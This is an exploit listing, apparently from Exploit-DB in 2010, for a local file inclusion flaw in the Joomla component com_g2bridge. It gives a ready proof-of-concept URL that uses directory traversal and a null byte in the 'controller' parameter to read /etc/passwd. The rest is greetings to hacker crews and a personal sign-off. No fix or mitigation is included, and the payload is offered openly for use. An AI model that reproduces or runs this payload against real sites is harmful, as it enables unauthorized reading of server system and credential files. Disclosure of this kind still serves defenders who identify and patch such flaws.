Joomla! Component com_g2bridge - Local File Inclusion

EDB-ID:

12814

CVE:



Platform:

PHP

Published:

2010-05-31

# Exploit Title: Joomla Component com_g2bridge LFI vulnerability
# Date: May 30th, 2010
# Author: akatsuchi [Explore Crew] hole@hackermail.com
# Platform / Tested on: CentOS release 4.8 (Final)
# category: webaps

=============================================================================================================


[*] Exploit

http://[site]//index.php?option=com_g2bridge&controller=[LFI]


[*] PoC

http://[site]//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../etc/passwd%00


=============================================================================================================


[*] Greetz

ArRay `yuda N4ck0 K4pt3N samu1241 bejamz Gameover antitos yuki pokeng
bjork NoGe c0li jack aJe kaka11 zxvf s4va zreg veter Ijoo
gore gp_davied put_ra Sephi4
Antisecurity Devilzcode evilc0de Mainhack serverisdown IndonesianHacker
Indonesian Coder | ByroeNet | and all can not wrotted


=============================================================================================================


[ It is my place. with all my friends. dgn orang-orang yang bisa menerima gw dan menganggap gw bagian darinya. karena ini adalah dunia kami. kami tidak ingin dibedakan. kita sama ]